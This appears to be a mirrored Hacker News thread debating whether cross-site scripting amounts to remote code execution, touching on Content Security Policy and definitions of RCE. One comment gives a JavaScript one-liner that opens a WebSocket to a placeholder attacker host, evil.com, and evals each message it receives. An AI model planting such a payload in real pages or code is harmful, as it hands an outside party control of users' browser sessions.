| HN Mirror

Y	Hacker News new \| ask \| show \| jobs


	by llmslave2 184 days ago
	How is XSS not remote code execution? You can do anything, from send fetch requests to the server with full credentials to loggging keystrokes or even open a tunnel and eval payloads... Anything the user can do, you can do via an XSS attack.

2 comments

rainonmoon 184 days ago

Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.

link

llmslave2 184 days ago

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

link

rainonmoon 184 days ago

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

link

zahlman 183 days ago

> Go to Discord and paste that into your console.

The same Discord that configures things so that any time you open the console it greets you with a giant message warning you not to paste anything into the console?

link

llmslave2 183 days ago

Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.

link

collinmanderson 183 days ago

Generally code execution within browser/client-side javascript sandbox is just "XSS".

RCE usually implies server-side code execution (or breaking out of browser sandbox).

link

llmslave2 183 days ago

Hmm, I've always thought of "RCE" in a more general way, regarding the ability to execute arbitrary code on a computer you don't own. For example some multiplayer games have had exploits that let hosts run arbitrary code on clients that connect to them, and I've seen that called an RCE vulnerability. shrugs

link

collinmanderson 182 days ago

If it’s running code outside of a normal browser sandbox then, yes it’s a RCE. Because it can now access to nearly everything on the user’s computer, including their browser, email, etc.

XSS is limited to accessing just that one website.

link